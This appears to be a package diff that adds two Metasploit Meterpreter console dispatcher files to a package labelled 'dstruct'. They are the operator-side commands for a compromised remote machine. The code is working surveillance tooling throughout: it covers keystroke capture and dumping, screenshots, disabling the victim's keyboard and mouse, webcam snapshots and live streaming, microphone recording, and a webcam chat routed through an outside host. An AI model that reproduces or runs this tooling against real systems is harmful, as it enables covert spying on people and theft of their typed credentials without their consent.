dstruct 0.0.1

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb

@@ -0,0 +1,318 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# The user interface portion of the standard API extension.
+#
+###
+class Console::CommandDispatcher::Stdapi::Ui
+
+  Klass = Console::CommandDispatcher::Stdapi::Ui
+
+  include Console::CommandDispatcher
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    all = {
+      "enumdesktops"  => "List all accessible desktops and window stations",
+      "getdesktop"    => "Get the current meterpreter desktop",
+      "idletime"      => "Returns the number of seconds the remote user has been idle",
+      "keyscan_dump"  => "Dump the keystroke buffer",
+      "keyscan_start" => "Start capturing keystrokes",
+      "keyscan_stop"  => "Stop capturing keystrokes",
+      "screenshot"    => "Grab a screenshot of the interactive desktop",
+      "setdesktop"    => "Change the meterpreters current desktop",
+      "uictl"         => "Control some of the user interface components"
+      #  not working yet
+      # "unlockdesktop" => "Unlock or lock the workstation (must be inside winlogon.exe)",
+    }
+
+    reqs = {
+      "enumdesktops"  => [ "stdapi_ui_desktop_enum" ],
+      "getdesktop"    => [ "stdapi_ui_desktop_get" ],
+      "idletime"      => [ "stdapi_ui_get_idle_time" ],
+      "keyscan_dump"  => [ "stdapi_ui_get_keys" ],
+      "keyscan_start" => [ "stdapi_ui_start_keyscan" ],
+      "keyscan_stop"  => [ "stdapi_ui_stop_keyscan" ],
+      "screenshot"    => [ "stdapi_ui_desktop_screenshot" ],
+      "setdesktop"    => [ "stdapi_ui_desktop_set" ],
+      "uictl"         => [
+        "stdapi_ui_enable_mouse",
+        "stdapi_ui_enable_keyboard"
+      ]
+    }
+
+    all.delete_if do |cmd, desc|
+      del = false
+      reqs[cmd].each do |req|
+        next if client.commands.include? req
+        del = true
+        break
+      end
+
+      del
+    end
+
+    all
+  end
+
+  #
+  # Name for this dispatcher.
+  #
+  def name
+    "Stdapi: User interface"
+  end
+
+  #
+  # Executes a command with some options.
+  #
+  def cmd_idletime(*args)
+    seconds = client.ui.idle_time
+
+    print_line(
+      "User has been idle for: #{Rex::ExtTime.sec_to_s(seconds)}")
+
+    return true
+  end
+
+  #
+  # Enables/disables user interface mice and keyboards on the remote machine.
+  #
+  def cmd_uictl(*args)
+    if (args.length < 2)
+      print_line(
+        "Usage: uictl [enable/disable] [keyboard/mouse]")
+      return true
+    end
+
+    case args[0]
+      when 'enable'
+        case args[1]
+          when 'keyboard'
+            print_line("Enabling keyboard...")
+            client.ui.enable_keyboard
+          when 'mouse'
+            print_line("Enabling mouse...")
+            client.ui.enable_mouse
+          else
+            print_error("Unsupported user interface device: #{args[1]}")
+        end
+      when 'disable'
+        case args[1]
+          when 'keyboard'
+            print_line("Disabling keyboard...")
+            client.ui.disable_keyboard
+          when 'mouse'
+            print_line("Disabling mouse...")
+            client.ui.disable_mouse
+          else
+            print_error("Unsupported user interface device: #{args[1]}")
+        end
+      else
+        print_error("Unsupported command: #{args[0]}")
+    end
+
+    return true
+  end
+
+  #
+  # Grab a screenshot of the current interactive desktop.
+  #
+  def cmd_screenshot( *args )
+    path    = Rex::Text.rand_text_alpha(8) + ".jpeg"
+    quality = 50
+    view    = false
+
+    screenshot_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner." ],
+      "-q" => [ true, "The JPEG image quality (Default: '#{quality}')" ],
+      "-p" => [ true, "The JPEG image path (Default: '#{path}')" ],
+      "-v" => [ true, "Automatically view the JPEG image (Default: '#{view}')" ]
+    )
+
+    screenshot_opts.parse( args ) { | opt, idx, val |
+      case opt
+        when "-h"
+          print_line( "Usage: screenshot [options]\n" )
+          print_line( "Grab a screenshot of the current interactive desktop." )
+          print_line( screenshot_opts.usage )
+          return
+        when "-q"
+          quality = val.to_i
+        when "-p"
+          path = val
+        when "-v"
+          view = false if ( val =~ /^(f|n|0)/i )
+      end
+    }
+
+    data = client.ui.screenshot( quality )
+
+    if( data )
+      ::File.open( path, 'wb' ) do |fd|
+        fd.write( data )
+      end
+
+      path = ::File.expand_path( path )
+
+      print_line( "Screenshot saved to: #{path}" )
+
+      Rex::Compat.open_file( path ) if view
+    end
+
+    return true
+  end
+
+  #
+  # Enumerate desktops
+  #
+  def cmd_enumdesktops(*args)
+    print_line( "Enumerating all accessible desktops" )
+
+    desktops = client.ui.enum_desktops
+
+    desktopstable = Rex::Ui::Text::Table.new(
+      'Header'  => "Desktops",
+      'Indent'  => 4,
+      'Columns' => [	"Session",
+              "Station",
+              "Name"
+            ]
+    )
+
+    desktops.each { | desktop |
+      session = desktop['session'] == 0xFFFFFFFF ? '' : desktop['session'].to_s
+      desktopstable << [ session, desktop['station'], desktop['name'] ]
+    }
+
+    if( desktops.length == 0 )
+      print_line( "No accessible desktops were found." )
+    else
+      print( "\n" + desktopstable.to_s + "\n" )
+    end
+
+    return true
+  end
+
+  #
+  # Get the current meterpreter desktop.
+  #
+  def cmd_getdesktop(*args)
+
+    desktop = client.ui.get_desktop
+
+    session = desktop['session'] == 0xFFFFFFFF ? '' : "Session #{desktop['session'].to_s}\\"
+
+    print_line( "#{session}#{desktop['station']}\\#{desktop['name']}" )
+
+    return true
+  end
+
+  #
+  # Change the meterpreters current desktop.
+  #
+  def cmd_setdesktop( *args )
+
+    switch   = false
+    dsession = -1
+    dstation = 'WinSta0'
+    dname    = 'Default'
+
+    setdesktop_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner." ],
+      #"-s" => [ true, "The session (Default: '#{dsession}')" ],
+      "-w" => [ true, "The window station (Default: '#{dstation}')" ],
+      "-n" => [ true, "The desktop name (Default: '#{dname}')" ],
+      "-i" => [ true, "Set this desktop as the interactive desktop (Default: '#{switch}')" ]
+    )
+
+    setdesktop_opts.parse( args ) { | opt, idx, val |
+      case opt
+        when "-h"
+          print_line( "Usage: setdesktop [options]\n" )
+          print_line( "Change the meterpreters current desktop." )
+          print_line( setdesktop_opts.usage )
+          return
+        #when "-s"
+        #  dsession = val.to_i
+        when "-w"
+          dstation = val
+        when "-n"
+          dname = val
+        when "-i"
+          switch = true if ( val =~ /^(t|y|1)/i )
+      end
+    }
+
+    if( client.ui.set_desktop( dsession, dstation, dname, switch ) )
+      print_line( "#{ switch ? 'Switched' : 'Changed' } to desktop #{dstation}\\#{dname}" )
+    else
+      print_line( "Failed to #{ switch ? 'switch' : 'change' } to desktop #{dstation}\\#{dname}" )
+    end
+
+    return true
+  end
+
+  #
+  # Unlock or lock the desktop
+  #
+  def cmd_unlockdesktop(*args)
+    mode = 0
+    if(args.length > 0)
+      mode = args[0].to_i
+    end
+
+    if(mode == 0)
+      print_line("Unlocking the workstation...")
+      client.ui.unlock_desktop(true)
+    else
+      print_line("Locking the workstation...")
+      client.ui.unlock_desktop(false)
+    end
+
+    return true
+  end
+
+  #
+  # Start the keyboard sniffer
+  #
+  def cmd_keyscan_start(*args)
+    print_line("Starting the keystroke sniffer...")
+    client.ui.keyscan_start
+    return true
+  end
+
+  #
+  # Stop the keyboard sniffer
+  #
+  def cmd_keyscan_stop(*args)
+    print_line("Stopping the keystroke sniffer...")
+    client.ui.keyscan_stop
+    return true
+  end
+
+  #
+  # Dump captured keystrokes
+  #
+  def cmd_keyscan_dump(*args)
+    print_line("Dumping captured keystrokes...")
+    data = client.ui.keyscan_dump
+    print_line(client.ui.keyscan_extract(data))
+
+    return true
+  end
+
+end
+
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb

@@ -0,0 +1,343 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Webcam - Capture video from the remote system
+#
+###
+class Console::CommandDispatcher::Stdapi::Webcam
+
+  Klass = Console::CommandDispatcher::Stdapi::Webcam
+
+  include Console::CommandDispatcher
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    all = {
+      "webcam_chat"   => "Start a video chat",
+      "webcam_list"   => "List webcams",
+      "webcam_snap"   => "Take a snapshot from the specified webcam",
+      "webcam_stream" => "Play a video stream from the specified webcam",
+      "record_mic"    => "Record audio from the default microphone for X seconds"
+    }
+    reqs = {
+      "webcam_chat"   => [ "webcam_list" ],
+      "webcam_list"   => [ "webcam_list" ],
+      "webcam_snap"   => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
+      "webcam_stream" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
+      "record_mic"    => [ "webcam_audio_record" ],
+    }
+
+    all.delete_if do |cmd, desc|
+      del = false
+      reqs[cmd].each do |req|
+        next if client.commands.include? req
+        del = true
+        break
+      end
+
+      del
+    end
+
+    all
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    "Stdapi: Webcam"
+  end
+
+  def cmd_webcam_list
+    begin
+      client.webcam.webcam_list.each_with_index { |name, indx|
+        print_line("#{indx + 1}: #{name}")
+      }
+      return true
+    rescue
+      print_error("No webcams were found")
+      return false
+    end
+  end
+
+  def cmd_webcam_snap(*args)
+    path    = Rex::Text.rand_text_alpha(8) + ".jpeg"
+    quality = 50
+    view    = true
+    index   = 1
+    wc_list = []
+
+    webcam_snap_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner" ],
+      "-i" => [ true, "The index of the webcam to use (Default: 1)" ],
+      "-q" => [ true, "The JPEG image quality (Default: '#{quality}')" ],
+      "-p" => [ true, "The JPEG image path (Default: '#{path}')" ],
+      "-v" => [ true, "Automatically view the JPEG image (Default: '#{view}')" ]
+    )
+
+    webcam_snap_opts.parse( args ) { | opt, idx, val |
+      case opt
+        when "-h"
+          print_line( "Usage: webcam_snap [options]\n" )
+          print_line( "Grab a frame from the specified webcam." )
+          print_line( webcam_snap_opts.usage )
+          return
+        when "-i"
+          index = val.to_i
+        when "-q"
+          quality = val.to_i
+        when "-p"
+          path = val
+        when "-v"
+          view = false if ( val =~ /^(f|n|0)/i )
+      end
+    }
+    begin
+      wc_list << client.webcam.webcam_list
+    rescue
+    end
+    if wc_list.length > 0
+      begin
+        print_status("Starting...")
+        client.webcam.webcam_start(index)
+        data = client.webcam.webcam_get_frame(quality)
+        print_good("Got frame")
+      ensure
+        client.webcam.webcam_stop
+        print_status("Stopped")
+      end
+
+      if( data )
+        ::File.open( path, 'wb' ) do |fd|
+          fd.write( data )
+        end
+        path = ::File.expand_path( path )
+        print_line( "Webcam shot saved to: #{path}" )
+        Rex::Compat.open_file( path ) if view
+      end
+      return true
+    else
+      print_error("No webcams where found")
+      return false
+    end
+  end
+
+  def cmd_webcam_chat(*args)
+    if client.webcam.webcam_list.length == 0
+      print_error("Target does not have a webcam")
+      return
+    end
+
+    server = 'wsnodejs.jit.su:80'
+
+    webcam_chat_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help banner"],
+      "-s" => [ false, "WebSocket server" ]
+    )
+
+    webcam_chat_opts.parse( args ) { | opt, idx, val |
+      case opt
+        when "-h"
+          print_line( "Usage: webcam_chat [options]\n" )
+          print_line( "Starts a video conversation with your target." )
+          print_line( "Browser Requirements:")
+          print_line( "Chrome: version 23 or newer" )
+          print_line( "Firefox: version 22 or newer" )
+          print_line( webcam_chat_opts.usage )
+          return
+        when "-s"
+          server = val.to_s
+      end
+    }
+
+
+    begin
+      print_status("Webcam chat session initialized.")
+      client.webcam.webcam_chat(server)
+    rescue RuntimeError => e 
+      print_error(e.message)
+    end
+  end
+
+  def cmd_webcam_stream(*args)
+    print_status("Starting...")
+    stream_path    = Rex::Text.rand_text_alpha(8) + ".jpeg"
+    player_path = Rex::Text.rand_text_alpha(8) + ".html"
+    duration = 1800
+    quality  = 50
+    view     = true
+    index    = 1
+    wc_list  = []
+
+    webcam_snap_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner" ],
+      "-d" => [ true, "The stream duration in seconds (Default: 1800)" ], # 30 min
+      "-i" => [ true, "The index of the webcam to use (Default: 1)" ],
+      "-q" => [ true, "The stream quality (Default: '#{quality}')" ],
+      "-s" => [ true, "The stream file path (Default: '#{stream_path}')" ],
+      "-t" => [ true, "The stream player path (Default: #{player_path})"],
+      "-v" => [ true, "Automatically view the stream (Default: '#{view}')" ]
+    )
+
+    webcam_snap_opts.parse( args ) { | opt, idx, val |
+      case opt
+        when "-h"
+          print_line( "Usage: webcam_stream [options]\n" )
+          print_line( "Stream from the specified webcam." )
+          print_line( webcam_snap_opts.usage )
+          return
+        when "-d"
+          duration = val.to_i
+        when "-i"
+          index = val.to_i
+        when "-q"
+          quality = val.to_i
+        when "-s"
+          stream_path = val
+        when "-t"
+          player_path = val
+        when "-v"
+          view = false if ( val =~ /^(f|n|0)/i )
+      end
+    }
+
+    print_status("Preparing player...")
+    html = %Q|<html>
+<head>
+<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
+<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
+<title>Metasploit webcam_stream - #{client.sock.peerhost}</title>
+<script language="javascript">
+function updateStatus(msg) {
+  var status = document.getElementById("status");
+  status.innerText = msg;
+}
+
+function noImage() {
+  document.getElementById("streamer").style = "display:none";
+  updateStatus("Waiting");
+}
+
+var i = 0;
+function updateFrame() {
+  var img = document.getElementById("streamer");
+  img.src = "#{stream_path}#" + i;
+  img.style = "display:";
+  updateStatus("Playing");
+  i++;
+}
+
+setInterval(function() {
+  updateFrame();
+},25);
+
+</script>
+</head>
+<body>
+<noscript>
+  <h2><font color="red">Error: You need Javascript enabled to watch the stream.</font></h2>
+</noscript>
+<pre>
+Target IP  : #{client.sock.peerhost}
+Start time : #{Time.now}
+Status     : <span id="status"></span>
+</pre>
+<br>
+<img onerror="noImage()" id="streamer">
+<br><br>
+<a href="http://www.metasploit.com" target="_blank">www.metasploit.com</a>
+</body>
+</html>
+    |
+
+    ::File.open(player_path, 'wb') do |f|
+      f.write(html)
+    end
+    if view
+      print_status("Opening player at: #{player_path}")
+      Rex::Compat.open_file(player_path) 
+    else
+      print_status("Please open the player manually with a browser: #{player_path}")
+    end
+
+    print_status("Streaming...")
+    begin
+      client.webcam.webcam_start(index)
+      ::Timeout.timeout(duration) {
+        while client do
+          data = client.webcam.webcam_get_frame(quality)
+          if data
+            ::File.open(stream_path, 'wb') do |f|
+             f.write(data)
+            end
+            data = nil
+          end
+        end
+      }
+    rescue ::Timeout::Error
+    ensure
+      client.webcam.webcam_stop
+    end
+
+    print_status("Stopped")
+  end
+
+  def cmd_record_mic(*args)
+    path    = Rex::Text.rand_text_alpha(8) + ".wav"
+    play    = true
+    duration   = 1
+
+    record_mic_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner" ],
+      "-d" => [ true, "Number of seconds to record (Default: 1)" ],
+      "-f" => [ true, "The wav file path (Default: '#{::File.expand_path( "[randomname].wav" )}')" ],
+      "-p" => [ true, "Automatically play the captured audio (Default: '#{play}')" ]
+    )
+
+    record_mic_opts.parse( args ) { | opt, idx, val |
+      case opt
+        when "-h"
+          print_line( "Usage: record_mic [options]\n" )
+          print_line( "Records audio from the default microphone." )
+          print_line( record_mic_opts.usage )
+          return
+        when "-d"
+          duration = val.to_i
+        when "-f"
+          path = val
+        when "-p"
+          play = false if ( val =~ /^(f|n|0)/i )
+      end
+    }
+
+    print_status("Starting...")
+    data = client.webcam.record_mic(duration)
+    print_status("Stopped")
+
+    if( data )
+      ::File.open( path, 'wb' ) do |fd|
+        fd.write( data )
+      end
+      path = ::File.expand_path( path )
+      print_line( "Audio saved to: #{path}" )
+      Rex::Compat.play_sound( path ) if play
+    end
+    return true
+  end
+
+end
+
+end
+end
+end
+end
+